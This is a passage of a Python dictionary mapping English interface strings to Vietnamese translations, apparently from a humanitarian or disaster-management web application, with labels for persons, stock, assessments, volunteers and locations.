"Nếu bạn không thấy dự án trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm dự án'", "If you don't see the type in the list, you can add a new one by clicking link 'Create Activity Type'.": "Nếu bạn không thấy loại hình hoạt động trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm loại hình hoạt động'", "If you don't see the vehicle in the list, you can add a new one by clicking link 'Add Vehicle'.": "Nếu bạn không thấy phương tiện vận chuyển trong danh sách, bạn có thể thêm mới bằng cách ấn nút 'Thêm phương tiện vận chuyển'", "If you enter a foldername then the layer will appear in this folder in the Map's layer switcher.": 'Nếu bạn nhập tên thư mục sau đó lớp đó sẽ hiện ra trong thư mục trong nút chuyển lớp Bản đồ.', "Last Week's Work": 'Công việc của tuấn trước', "Level is higher than parent's": 'Cấp độ cao hơn cấp độ gốc', "List Persons' Details": 'Liệt kê thông tin cá nhân', "Need a 'url' argument!": "Cần đối số cho 'url'!", "No UTC offset found. Please set UTC offset in your 'User Profile' details. Example: UTC+0530": "Không có thời gian bù UTC được tìm thấy. Cài đặt thời gian bù UTC trong thông tin 'Hồ sơ người sử dụng' của bạn. Ví dụ: UTC+0530", "Only Categories of type 'Vehicle' will be seen in the dropdown.": "Chỉ những hạng mục thuộc 'Xe cộ' được thể hiện trong danh sách thả xuống", "Optional. The name of the geometry column. In PostGIS this defaults to 'the_geom'.": "Tùy chọn. Tên của cột hình dạng. Trong PostGIS tên này được mặc định là 'the_geom'.", "Parent level should be higher than this record's level. Parent level is": 'Mức độ cấp trên phải cao hơn mức độ của bản lưu này. Mức độ cấp trên là', "Password fields don't match": 'Trường mật khẩu không tương thích', "Person's Details added": 'Thông tin được thêm vào của cá nhân', "Person's Details deleted": 'Thông tin đã xóa của cá nhân', "Person's Details updated": 'Thông tin được cập nhật của cá nhân', "Person's Details": 'Thông tin cá nhân', "Persons' Details": 'Thông tin cá nhân', "Phone number to donate to this organization's relief efforts.": 'Số điện thoại để ủng hộ cho những nỗ lực cứu trợ của tổ chức này', "Please come back after sometime if that doesn't help.": 'Xin vui lòng quay trở lại sau nếu điều đó không giúp ích bạn.', "Please provide as much detail as you can, including the URL(s) where the bug occurs or you'd like the new feature to go.": 'Xin vui lòng cung cấp thông tin chi tiết nhất có thể, bao gồm những đường dẫn URL chứa các lỗi kỹ thuật hay bạn muốn thực hiện chức năng mới.', "Post graduate (Doctor's)": 'Tiến sỹ', "Post graduate (Master's)": 'Thạc sỹ', "Quantity in %s's Warehouse": 'Số lượng trong %s Nhà kho', "Search Person's Details": 'Tìm kiếm thông tin cá nhân', "Select a Facility Type from the list or click 'Create Facility Type'": "Chọn loại hình bộ phận từ danh sách hoặc bấm 'Thêm loại hình bộ phận'", "Select a Room from the list or click 'Create Room'": "Chọn một Phòng từ danh sách hay bấm 'Thêm Phòng'", "Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.": "Chọn nó nếu tất cả các điểm cụ thể cần lớp cao nhất trong hệ thống hành chính các địa điểm. Ví dụ, nếu 'là lớp huyện' là phân chia nhỏ nhất trong hệ thống, do vậy các địa điểm cụ thể sẽ yêu cầu có lớp huyện là lớp trên.", "Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.": 'Chọn nó nếu tất cả các điểm cụ thể cần lớp trên trong hệ thống hành chính các địa điểm. Nó có thể giúp lập nên một vùng diện cho một vùng bị ảnh hưởng. ', "Sorry, things didn't get done on time.": 'Xin lỗi, công việc đã không được làm đúng lúc.', "Sorry, we couldn't find that page.": 'Xin lỗi, chúng tôi không thể tìm thấy trang đó', "Status 'assigned' requires the %(fieldname)s to not be blank": "Tình trạng 'được bổ nhiệm' đòi hỏi %(fieldname)s không được bỏ trống", "System's Twitter account updated": 'Tài khoản Twitter của Hệ thống được cập nhật', "The Project module can be used to record Project Information and generate Who's Doing What Where reports.": 'Mô đun Dự án có thể được sử dụng để ghi lại Thông tin Dự án và cho ra các báo cáo Ai Đang làm Điều gì Ở đâu.', "The URL of the image file. If you don't upload an image file, then you must specify its location here.": 'Đường dẫn URL của tệp tin hình ảnh. Nếu bạn không tải tệp tin hình ảnh lên, thì bạn phải đưa đường dẫn tới vị trí của tệp tin đó tại đây.', "The person's manager within this Office/Project.": 'Quản lý của một cá nhân trong Văn phòng/Dự án', "The staff member's official job title": 'Chức vụ chính thức của cán bộ', "The volunteer's role": 'Vai trò của tình nguyện viên', "There are no details for this person yet. Add Person's Details.": 'Chưa có thông tin về người này. Hãy thêm Thông tin.', "To search for a hospital, enter any part of the name or ID. You may use % as wildcard. Press 'Search' without input to list all hospitals.": 'Để tìm kiếm một bệnh viện, nhập một phần tên hoặc ID. Có thể sử dụng % như một ký tự thay thế cho một nhóm ký tự. Nhấn "Tìm kiếm" mà không nhập thông tin, sẽ hiển thị toàn bộ các bệnh viện.', "To search for a location, enter the name. You may use % as wildcard. Press 'Search' without input to list all locations.": "Dể tìm kiếm địa điểm, nhập tên của địa điểm đó. Bản có thể sử dụng ký tự % như là ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập tên địa điểm để liệt kê toàn bộ địa điểm.", "To search for a member, enter any portion of the name of the person or group. You may use % as wildcard. Press 'Search' without input to list all members": "Để tìm thành viên, nhập tên của thành viên hoặc nhóm. Bạn có thể sử dụng % như là ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập tên để liệt toàn bộ thành viên", "To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Để tìm kiếm người, nhập bất kỳ tên, tên đệm hoặc tên họ và/ hoặc số nhận dạng cá nhân của người đó, tách nhau bởi dấu cách. Ấn nút 'Tìm kiếm' mà không nhập tên người để liệt kê toàn bộ người.", "Type the first few characters of one of the Participant's names.": 'Nhập những ký tự đầu tiên trong tên của một Người tham dự.', "Type the first few characters of one of the Person's names.": 'Nhập những ký tự đầu tiên trong tên của một Người.', "Type the name of an existing catalog item OR Click 'Create Item' to add an item which is not in the catalog.": "Nhập tên của một mặt hàng trong danh mục đang tồn tại HOẶC Nhấn 'Thêm mặt hàng mới' để thêm một mặt hàng chưa có trong danh mục.", "Upload an image file here. If you don't upload an image file, then you must specify its location in the URL field.": 'Tải lên file hình ảnh tại đây. Nếu bạn không đăng tải được file hình ảnh, bạn phải chỉ đường dẫn chính xác tới vị trí của file trong trường URL.', "Uploaded file(s) are not Image(s). Supported image formats are '.png', '.jpg', '.bmp', '.gif'.": "File được tải không phải là hình ảnh. Định dạng hình ảnh hỗ trợ là '.png', '.jpg', '.bmp', '.gif'", "View and/or update details of the person's record": 'Xem và/hoặc cập nhật chi tiết mục ghi cá nhân', """Welcome to %(system_name)s - You can start using %(system_name)s at: %(url)s - To edit your profile go to: %(url)s%(profile)s Thank you""": """Chào mừng anh/chị truy cập %(system_name)s Anh/chị có thể bắt đầu sử dụng %(system_name)s tại %(url)s Để chỉnh sửa hồ sơ của anh/chị, xin vui lòng truy cập %(url)s%(profile)s Cảm ơn""", "Yes, No, Don't Know": 'Có, Không, Không biết', "You can search by asset number, item description or comments. You may use % as wildcard. Press 'Search' without input to list all assets.": "Bạn có thể tìm kiếm theo mã số tài sản, mô tả mặt hàng hoặc các bình luận. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả tài sản.", "You can search by course name, venue name or event comments. You may use % as wildcard. Press 'Search' without input to list all events.": "Bạn có thể tìm kiếm theo tên khóa học, tên địa điểm tổ chức hoặc bình luận về khóa học. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả khóa học.", "You can search by description. You may use % as wildcard. Press 'Search' without input to list all incidents.": "Bạn có thể tìm kiếm theo mô tả. Bạn có thể sử dụng % làm ký tự đại diện. Không nhập thông tin và nhấn 'Tìm kiếm' để liệt kê tất cả các sự kiện.", "You can search by job title or person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Bạn có thể tìm kiếm theo chức vụ nghề nghiệp hoặc theo tên đối tượng - nhập bất kỳ tên nào trong tên chính, tên đệm hay họ, tách nhau bởi dấu cách. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả đối tượng.", "You can search by person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": "Bạn có thể tìm kiếm theo tên người - nhập bất kỳ tên, tên đệm hay tên họ, tách nhau bởi dấu cách. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả số người.", "You can search by trainee name, course name or comments. You may use % as wildcard. Press 'Search' without input to list all trainees.": "Bạn có thể tìm kiếm bằng tên người được tập huấn, tên khóa học hoặc các bình luận. Bạn có thể sử dụng % làm ký tự đặc trưng. Ấn nút 'Tìm kiếm' mà không nhập giá trị để liệt kê tất cả người được tập huấn.", "You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'Bạn đã thiết lập các cài đặt cá nhân, vì vậy bạn không xem được các thay đổi ở đây.Để thiết lập lại, nhấp chuột vào', "You have unsaved changes. Click Cancel now, then 'Save' to save them. Click OK now to discard them.": "Bạn chưa lưu các thay đổi. Ấn 'Hủy bỏ' bây giờ, sau đó ấn 'Lưu' để lưu lại. Ấn OK bây giờ để bỏ các thay đổi", "communications systems, health facilities, 'lifelines', power and energy, emergency evacuation shelters, financial infrastructure, schools, transportation, waste disposal, water supp": 'hệ thống thông tin liên lạc, cơ sở CSSK, hệ thống bảo hộ, năng lượng, các địa điểm sơ tán trong tình huống khẩn cấp, hạ tầng tài chính, trường học, giao thông, bãi rác thải, hệ thống cấp nước', '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"cập nhật" là một lựa chọn như "Thực địa1=\'giá trị mới\'". Bạn không thể cập nhật hay xóa các kết quả của một NHÓM', '# of Houses Damaged': 'Số nóc nhà bị phá hủy', '# of Houses Destroyed': 'Số căn nhà bị phá hủy', '# of International Staff': 'số lượng cán bộ quốc tế', '# of National Staff': 'số lượng cán bộ trong nước', '# of People Affected': 'Số người bị ảnh hưởng', '# of People Injured': 'Số lượng người bị thương', '%(GRN)s Number': '%(GRN)s Số', '%(GRN)s Status': '%(GRN)s Tình trạng', '%(PO)s Number': '%(PO)s Số', '%(REQ)s Number': '%(REQ)s Số', '%(app)s not installed. Ask the Server Administrator to install on Server.': '%(app)s dụng chưa được cài. Liên hệ với ban quản trị máy chủ để cài ứng dụng trên máy chủ', '%(count)s Entries Found': '%(count)s Hồ sơ được tìm thấy', '%(count)s Roles of the user removed': '%(count)s Đã gỡ bỏ chức năng của người sử dụng', '%(count)s Users removed from Role': '%(count)s Đã xóa người sử dụng khỏi chức năng', '%(count_of)d translations have been imported to the %(language)s language file': '%(count_of)d bản dịch được nhập liệu trong %(language)s file ngôn ngữ', '%(item)s requested from %(site)s': '%(item)s đề nghị từ %(site)s', '%(module)s not installed': '%(module)s chưa được cài đặt', '%(pe)s in %(location)s': '%(pe)s tại %(location)s', '%(quantity)s in stock': '%(quantity)s hàng lưu kho', '%(system_name)s has sent an email to %(email)s to verify your email address.\nPlease check your email to verify this address. If you do not receive this email please check you junk email or spam filters.': '%(system_name)s đã gửi email đến %(email)s để kiểm tra địa chỉ email của bạn.\nĐề nghị kiểm tra email để xác nhận. Nếu bạn không nhận được hãy kiểm tra hộp thư rác hay bộ lọc thư rác.', '%s items are attached to this shipment': '%s hàng hóa được chuyển trong đợt xuất hàng này', '& then click on the map below to adjust the Lat/Lon fields': '& sau đó chọn trên bản đồ để chính sửa số kinh/vĩ độ', '(filtered from _MAX_ total entries)': '(lọc từ _MAX_ toàn bộ hồ sơ)', '* Required Fields': '* Bắt buộc phải điền', '...or add a new bin': '…hoặc thêm một ngăn mới', '1 Assessment': '1 Đánh giá', '1 location, shorter time, can contain multiple Tasks': '1 địa điểm, thời gian ngắn hơn, có thể bao gồm nhiều nhiệm vụ khác nhau', '1. Fill the necessary fields in BLOCK CAPITAL letters.': '1. Điền nội dung vào các ô cần thiết bằng CHỮ IN HOA.', '2. Always use one box per letter and leave one box space to separate words.': '2. Luôn sử dụng một ô cho một chữ cái và để một ô trống để cách giữa các từ', '3. Fill in the circles completely.': '3. Điền đầy đủ vào các ô tròn', '3W Report': 'Báo cáo 3W', 'A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class.': 'Một đánh dấu cho một vị trí đơn lẻ nếu cần thiết để thay thế một Đánh dấu theo chức năng.', 'A brief description of the group (optional)': 'Mô tả ngắn gọn nhóm đánh giá (không bắt buộc)', 'A catalog of different Assessment Templates including summary information': 'Danh mục các biểu mẫu đánh giá khác nhau bao gồm cả thông tin tóm tắt', 'A file in GPX format taken from a GPS.': 'file định dạng GPX từ máy định vị GPS.', 'A place within a Site like a Shelf, room, bin number etc.': 'Một nơi trên site như số ngăn ,số phòng,số thùng v.v', 'A project milestone marks a significant date in the calendar which shows that progress towards the overall objective is being made.': 'Một mốc quan trọng của dự án đánh dấu ngày quan trọng trong lịch để chỉ ra tiến độ đạt được mục tổng quát của dự án.', 'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'Upload ảnh chụp vị trí hoặc tài liệu bổ sung chứa thông tin bổ sung về trang web tại đây', 'A staff member may have multiple roles in addition to their formal job title.': 'Một cán bộ có thể có nhiều chức năng nhiệm vụ bổ sung thêm vào chức năng nhiệm vụ chính.', 'A strict location hierarchy cannot have gaps.': 'Thứ tự vi trí đúng không thể có khoảng cách.', 'A survey series with id %s does not exist. Please go back and create one.': 'Chuỗi khảo sát số %s không tồn tai.Vui lòng quay lại và tạo mới', 'A task is a piece of work that an individual or team can do in 1-2 days.': 'Nhiệm vụ là công việc mà một cá nhân hoặc nhóm có thể thực hiện trong 1-2 ngày.', 'A volunteer may have multiple roles in addition to their formal job title.': 'Một tình nguyện viên có thể có nhiều chức năng nhiệm vụ bổ sung thêm vào chức năng nhiệm vụ chính.', 'ABOUT CALCULATIONS': 'TẠM TÍNH', 'ABOUT THIS MODULE': 'Giới thiệu Module này', 'ABSOLUTE%(br)sDEVIATION': 'HOÀN TOÀN%(br)sCHỆCH HƯỚNG', 'ACTION REQUIRED': 'HÀNH ĐỘNG ĐƯỢC YÊU CẦU', 'ALL REPORTS': 'TẤT CẢ BÁO CÁO', 'ALL': 'Tất cả', 'ANY': 'BẤT KỲ', 'API is documented here': 'API được lưu trữ ở đây', 'APPROVE REPORTS': 'PHÊ DUYỆT BÁO CÁO', 'AUTH TOKEN': 'THẺ XÁC THỰC', 'Abbreviation': 'Từ viết tắt', 'Ability to customize the list of human resource tracked at a Shelter': 'Khả năng tùy chỉnh danh sách nguồn nhân lực theo dõi tại nơi cư trú', 'Ability to customize the list of important facilities needed at a Shelter': 'Khả năng tùy chỉnh danh sách các điều kiện quan trọng cần thiết tại một cơ sở cư trú', 'Able to Respond?': 'Có khả năng ứng phó không?', 'About Us': 'Giới thiệu', 'About': 'Khoảng', 'Accept Push': 'Chấp nhận Đẩy', 'Accept unsolicited data transmissions from the repository.': 'Chấp nhận truyền các dữ liệu chưa tổng hợp từ kho dữ liệu.', 'Access denied': 'Từ chối truy cập', 'Account Name': 'Tên tài khoản', 'Account Registered - Please Check Your Email': 'Tài khoản đã được đăng ký- Kiểm tra email của bạn', 'Achieved': 'Thành công', 'Acronym': 'Từ viết tắt', 'Action': 'Hành động', 'Actioning officer': 'Cán bộ hành động', 'Actions taken as a result of this request.': 'Hành động được thực hiện như là kết quả của yêu cầu này.', 'Actions': 'Hành động', 'Activate': 'Kích hoạt', 'Active Problems': 'Có vấn đề kích hoạt', 'Active': 'Đang hoạt động', 'Active?': 'Đang hoạt động?', 'Activities matching Assessments': 'Hoạt động phù hợp với Đánh giá', 'Activities': 'Hoạt động', 'Activity Added': 'Hoạt động đã được thêm mới', 'Activity Deleted': 'Hoạt động đã được xóa', 'Activity Details': 'Chi tiết hoạt động', 'Activity Report': 'Báo cáo hoạt động', 'Activity Type Added': 'Loại hình hoạt động đã được thêm mới', 'Activity Type Deleted': 'Loại hình hoạt động đã được xóa', 'Activity Type Sectors': 'Lĩnh vực của loại hình hoạt động', 'Activity Type Updated': 'Loại hình hoạt động đã được cập nhật', 'Activity Type': 'Hoạt động', 'Activity Types': 'Hoạt động', 'Activity Updated': 'Hoạt động đã được cập nhật', 'Activity': 'Hoạt động', 'Add Activity Type': 'Thêm loại hình hoạt động', 'Add Address': 'Thêm địa chỉ', 'Add Affiliation': 'Thêm liên kết', 'Add Aid Request': 'Thêm yêu cầu cứu trợ', 'Add Alternative Item': 'Thêm mặt hàng thay thế', 'Add Annual Budget': 'Thêm ngân sách năm', 'Add Assessment Answer': 'Thêm câu trả lời đánh giá', 'Add Assessment Templates': 'Thêm biểu mẫu đánh giá', 'Add Assessment': 'Thêm đợt đánh giá', 'Add Award': 'Thêm mới', 'Add Beneficiaries': 'Thêm người hưởng lợi', 'Add Branch Organization': 'Thêm tổ chức cấp tỉnh/ huyện/ xã', 'Add Certificate for Course': 'Thêm chứng nhận khóa tập huấn', 'Add Certification': 'Thêm bằng cấp', 'Add Contact Information': 'Thêm thông tin liên hệ', 'Add Contact': 'Thêm liên lạc', 'Add Credential': 'Thêm thư ủy nhiệm', 'Add Data to Theme Layer': 'Thêm dữ liệu vào lớp chủ đề', 'Add Demographic Data': 'Thêm số liệu dân số', 'Add Demographic Source': 'Thêm nguồn thông tin dân số', 'Add Demographic': 'Thêm dữ liệu nhân khẩu', 'Add Disciplinary Action': 'Thêm mới', 'Add Disciplinary Action Type': 'Thêm hình thức kỷ luật', 'Add Distribution': 'Thêm thông tin hàng hóa đóng góp', 'Add Donor': 'Thêm tên người quyên góp vào danh sách', 'Add Education': 'Thêm trình độ học vấn', 'Add Email Settings': 'Thêm cài đặt email', 'Add Employment': 'Thêm mới', 'Add Framework': 'Thêm khung chương trình', 'Add Group Member': 'Thêm thành viên nhóm', 'Add Hours': 'Thêm thời gian hoạt động', 'Add Identity': 'Thêm nhận dạng', 'Add Image': 'Thêm hình ảnh', 'Add Item Catalog': 'Thêm danh mục hàng hóa', 'Add Item to Catalog': 'Thêm hàng hóa vào danh mục', 'Add Item to Commitment': 'Thêm hàng hóa vào cam kết', 'Add Item to Request': 'Thêm hàng hóa mới để yêu cầu', 'Add Item to Shipment': 'Thêm hàng hóa vào lô hàng chuyển đi', 'Add Item to Stock': 'Thêm mặt hàng lưu kho', 'Add Item': 'Thêm hàng hóa', 'Add Job Role': 'Thêm chức năng công việc', 'Add Key': 'Thêm từ khóa', 'Add Kit': 'Thêm Kit', 'Add Layer from Catalog': 'Thêm lớp từ danh mục', 'Add Layer to this Profile': 'Thêm lớp vào hồ sơ này', 'Add Line': 'Thêm dòng', 'Add Locations': 'Thêm địa điểm mới', 'Add Log Entry': 'Thêm ghi chép nhật ký', 'Add Member': 'Thêm hội viên', 'Add Membership': 'Thêm nhóm hội viên', 'Add Message': 'Thêm tin nhắn', 'Add New Aid Request': 'Thêm yêu cầu cứu trợ mới', 'Add New Beneficiaries': 'Thêm người hưởng lợi mới', 'Add New Beneficiary Type': 'Thêm loại người hưởng lợi mới', 'Add New Branch': 'Thêm chi nhánh mới', 'Add New Cluster': 'Thêm nhóm mới', 'Add New Commitment Item': 'Thêm hàng hóa cam kết mới', 'Add New Community': 'Thêm cộng đồng mới', 'Add New Config': 'Thêm cấu hình mới', 'Add New Demographic Data': 'Thêm số liệu dân số mới', 'Add New Demographic Source': 'Thêm nguồn số liệu dân số mới', 'Add New Demographic': 'Thêm dữ liệu nhân khẩu mới', 'Add New Document': 'Thêm tài liệu mới', 'Add New Donor': 'Thêm nhà tài trợ mới', 'Add New Entry': 'Thêm hồ sơ mới', 'Add New Flood Report': 'Thêm báo cáo lũ lụt mới', 'Add New Framework': 'Thêm khung chương trình mới', 'Add New Image': 'Thêm hình ảnh mới', 'Add New Item to Stock': 'Thêm hàng hóa mới để lưu trữ', 'Add New Job Role': 'Thêm chức năng công việc mới', 'Add New Key': 'Thêm Key mới', 'Add New Layer to Symbology': 'Thêm lớp mới vào các mẫu biểu tượng', 'Add New Mailing List': 'Thêm danh sách gửi thư mới', 'Add New Member': 'Thêm hội viên mới', 'Add New Membership Type': 'Thêm loại nhóm hội viên mới', 'Add New Membership': 'Thêm nhóm hội viên mới', 'Add New Organization Domain': 'Thêm lĩnh vực hoạt động mới của tổ chức', 'Add New Output': 'Thêm kết quả đầu ra mới', 'Add New Participant': 'Thêm người tham dự mới', 'Add New Problem': 'Thêm vấn đề mới', 'Add New Profile Configuration': 'Thêm định dạng hồ sơ tiểu sử mới', 'Add New Record': 'Thêm hồ sơ mới', 'Add New Request Item': 'Thêm yêu cầu hàng hóa mới', 'Add New Request': 'Thêm yêu cầu mới', 'Add New Response': 'Thêm phản hồi mới', 'Add New Role to User': 'Gán vai trò mới cho người dùng', 'Add New Shipment Item': 'Thêm mặt hàng mới được vận chuyển', 'Add New Site': 'Thêm trang web mới', 'Add New Solution': 'Thêm giải pháp mới', 'Add New Staff Assignment': 'Thêm nhiệm vụ mới cho cán bộ', 'Add New Staff': 'Thêm bộ phận nhân viên', 'Add New Storage Location': 'Thêm Vị trí kho lưu trữ mới', 'Add New Survey Template': 'Thêm mẫu khảo sát mới', 'Add New Team Member': 'Thêm thành viên mới', 'Add New Team': 'Thêm Đội/Nhóm mới', 'Add New Unit': 'Thêm đơn vị mới', 'Add New Vehicle Assignment': 'Thêm phân công mới cho phương tiện vận chuyển', 'Add New Vulnerability Aggregated Indicator': 'Thêm chỉ số gộp mới đánh giá tình trạng dễ bị tổn thương', 'Add New Vulnerability Data': 'Thêm dữ liệu mới về tình trạng dễ bị tổn thương', 'Add New Vulnerability Indicator Sources': 'Thêm nguồn chỉ số mới đánh giá tình trạng dễ bị tổn thương', 'Add New Vulnerability Indicator': 'Thêm chỉ số mới đánh giá tình trạng dễ bị tổn thương', 'Add Order': 'Thêm đơn đặt hàng', 'Add Organization Domain': 'Thêm lĩnh vực hoạt động của tổ chức', 'Add Organization to Project': 'Thêm tổ chức tham gia dự án', 'Add Parser Settings': 'Thêm cài đặt cú pháp', 'Add Participant': 'Thêm người tham dự', 'Add Person to Commitment': 'Thêm đối tượng cam kết', 'Add Person': 'Thêm họ tên', 'Add Photo': 'Thêm ảnh', 'Add Point': 'Thêm điểm', 'Add Polygon': 'Thêm đường chuyền', 'Add Professional Experience': 'Thêm kinh nghiệm nghề nghiệp', 'Add Profile Configuration for this Layer': 'Thêm định dạng hồ sơ tiểu sử cho lớp này', 'Add Profile Configuration': 'Thêm hồ sơ tiểu sử', 'Add Program Hours': 'Thêm thời gian tham gia chương trình', 'Add Recipient': 'Thêm người nhận viện trợ', 'Add Record': 'Thêm hồ sơ', 'Add Reference Document': 'Thêm tài liệu tham chiếu', 'Add Request Detail': 'thêm chi tiết yêu cầu', 'Add Request Item': 'Thêm yêu cầu hàng hóa', 'Add Request': 'Thêm yêu cầu', 'Add Salary': 'Thêm mới', 'Add Salary Grade': 'Thêm bậc lương', 'Add Sender Organization': 'Thêm tổ chức gửi', 'Add Setting': 'Thêm cài đặt', 'Add Site': 'Thêm site', 'Add Skill Equivalence': 'Thêm kỹ năng tương đương', 'Add Skill Types': 'Thêm loại kỹ năng', 'Add Skill to Request': 'Thêm kỹ năng để yêu cầu', 'Add Staff Assignment': 'Thêm nhiệm vụ cho cán bộ', 'Add Staff Level': 'Thêm ngạch công chức', 'Add Staff Member to Project': 'Thêm cán bộ thực hiện dự án', 'Add Stock to Warehouse': 'Thêm hàng vào kho', 'Add Storage Location ': 'Thêm vị trí lưu trữ', 'Add Storage Location': 'Thêm vị trí lưu trữ', 'Add Sub-Category': 'Thêm danh mục cấp dưới', 'Add Survey Answer': 'Thêm trả lời khảo sát', 'Add Survey Question': 'Thêm câu hỏi khảo sát', 'Add Survey Section': 'Thêm phần Khảo sát', 'Add Survey Series': 'Thêm chuỗi khảo sát', 'Add Survey Template': 'Thêm mẫu khảo sát', 'Add Symbology to Layer': 'Thêm biểu tượng cho lớp', 'Add Team Member': 'Thêm thành viên Đội/Nhóm', 'Add Team': 'Thêm Đội/Nhóm', 'Add Template Section': 'Thêm nội dung vào biểu mẫu', 'Add Training': 'Thêm tập huấn', 'Add Translation Language': 'Thêm ngôn ngữ biên dịch mới', 'Add Twilio Settings': 'Thêm cài đặt Twilio', 'Add Unit': 'Thêm đơn vị', 'Add Vehicle Assignment': 'Thêm phân công cho phương tiện vận chuyển', 'Add Vehicle': 'Thêm phương tiện vận chuyển', 'Add Volunteer Registration': 'Thêm Đăng ký tình nguyện viên', 'Add Volunteer to Project': 'Thêm tình nguyện viên hoạt động trong dự án', 'Add Vulnerability Aggregated Indicator': 'Thêm chỉ số gộp đánh giá tình trạng dễ bị tổn thương', 'Add Vulnerability Data': 'Thêm dữ liệu về tình trạng dễ bị tổn thương', 'Add Vulnerability Indicator Source': 'Thêm nguồn chỉ số đánh giá tình trạng dễ bị tổn thương', 'Add Vulnerability Indicator': 'Thêm chỉ số đánh giá tình trạng dễ bị tổn thương', 'Add a description': 'Thêm miêu tả', 'Add a new Assessment Answer': 'Thêm câu trả lời mới trong mẫu đánh giá', 'Add a new Assessment Question': 'Thêm câu hỏi mới trong mẫu đánh giá', 'Add a new Assessment Template': 'Thêm biểu mẫu đánh giá mới', 'Add a new Completed Assessment Form': 'Thêm mẫu đánh giá được hoàn thiện mới', 'Add a new Disaster Assessment': 'Thêm báo cáo đánh giá thảm họa mới', 'Add a new Site from where the Item is being sent.': 'Thêm Site nơi gửi hàng hóa đến ', 'Add a new Template Section': 'Thêm nội dung mới vào biểu mẫu', 'Add a new certificate to the catalog.': 'Thêm chứng chỉ mới vào danh mục', 'Add a new competency rating to the catalog.': 'Thêm xếp loại năng lực mới vào danh mục', 'Add a new membership type to the catalog.': 'Thêm loại hình nhóm hội viên mới vào danh mục', 'Add a new programme to the catalog.': 'Thêm chương trình mới vào danh mục', 'Add a new skill type to the catalog.': 'Thêm loại kỹ năng mới vào danh mục', 'Add all organizations which are involved in different roles in this project': 'Thêm tất cả tổ chức đang tham gia vào dự án với vai trò khác nhau', 'Add all': 'Thêm tất cả', 'Add new Group': 'Thêm nhóm mới', 'Add new Question Meta-Data': 'Thêm siêu dữ liệu câu hỏi mới', 'Add new and manage existing members.': 'Thêm mới và quản lý hội viên.', 'Add new and manage existing staff.': 'Thêm mới và quản lý cán bộ.', 'Add new and manage existing volunteers.': 'Thêm mới và quản lý tình nguyện viên.', 'Add new position.': 'Thêm địa điểm mới', 'Add new project.': 'Thêm dự án mới', 'Add new staff role.': 'Thêm vai trò nhân viên mới', 'Add saved search': 'Thêm tìm kiếm đã lưu', 'Add strings manually through a text file': 'Thêm chuỗi ký tự thủ công bằng file văn bản', 'Add strings manually': 'Thêm chuỗi ký tự thủ công', 'Add the Storage Location where this this Bin belongs to.': 'Thêm vị trí kho lưu trữ chứa Bin này', 'Add the main Warehouse/Site information where this Item is to be added.': 'Thêm thông tin Nhà kho/Site chứa hàng hóa đã được nhập thông tin', 'Add this entry': 'Thêm hồ sơ này', 'Add to Bin': 'Thêm vào thùng', 'Add': 'Thêm', 'Add...': 'Thêm…', 'Add/Edit/Remove Layers': 'Thêm/Sửa/Xóa các lớp', 'Added to Group': 'Nhóm hội viên đã được thêm', 'Added to Team': 'Nhóm hội viên đã được thêm', 'Address Details': 'Chi tiết địa chỉ', 'Address Type': 'Loại địa chỉ', 'Address added': 'Địa chỉ đã được thêm', 'Address deleted': 'Địa chỉ đã được xóa', 'Address updated': 'Địa chỉ đã được cập nhật', 'Address': 'Địa chỉ', 'Addresses': 'Địa chỉ', 'Adjust Item Quantity': 'Chỉnh sửa số lượng mặt hàng', 'Adjust Stock Item': 'Chỉnh sửa mặt hàng lưu kho', 'Adjust Stock Levels': 'Điều chỉnh cấp độ hàng lưu kho', 'Adjust Stock': 'Chỉnh sửa hàng lưu kho', 'Adjustment created': 'Chỉnh sửa đã được tạo', 'Adjustment deleted': 'Chỉnh sửa đã đươc xóa', 'Adjustment modified': 'Chỉnh sửa đã được thay đổi', 'Admin Email': 'Email của quản trị viên', 'Admin Name': 'Tên quản trị viên', 'Admin Tel': 'Số điện thoại của Quản trị viên', 'Admin': 'Quản trị', 'Administration': 'Quản trị', 'Administrator': 'Quản trị viên', 'Adolescent (12-20)': 'Vị thành niên (12-20)', 'Adult (21-50)': 'Người trưởng thành (21-50)', 'Adult Psychiatric': 'Bệnh nhân tâm thần', 'Adult female': 'Nữ giới', 'Adult male': 'Đối tượng người lớn là nam ', 'Advance': 'Cao cấp', 'Advanced Catalog Search': 'Tìm kiếm danh mục nâng cao', 'Advanced Category Search': 'Tìm kiếm danh mục nâng cao', 'Advanced Location Search': 'Tìm kiếm vị trí nâng cao', 'Advanced Search': 'Tìm kiếm nâng cao', 'Advanced Site Search': 'Tìm kiếm website nâng cao', 'Advocacy': 'Vận động chính sách', 'Affected Persons': 'Người bị ảnh hưởng', 'Affiliation Details': 'Chi tiết liên kết', 'Affiliation added': 'Liên kết đã được thêm', 'Affiliation deleted': 'Liên kết đã được xóa', 'Affiliation updated': 'Liên kết đã được cập nhật', 'Affiliations': 'Liên kết', 'Age Group (Count)': 'Nhóm tuổi (Số lượng)', 'Age Group': 'Nhóm tuổi', 'Age group does not match actual age.': 'Nhóm tuổi không phù hợp với tuổi hiện tại', 'Aid Request Details': 'Chi tiết yêu cầu cứu trợ', 'Aid Request added': 'Đã thêm yêu cầu viện trợ', 'Aid 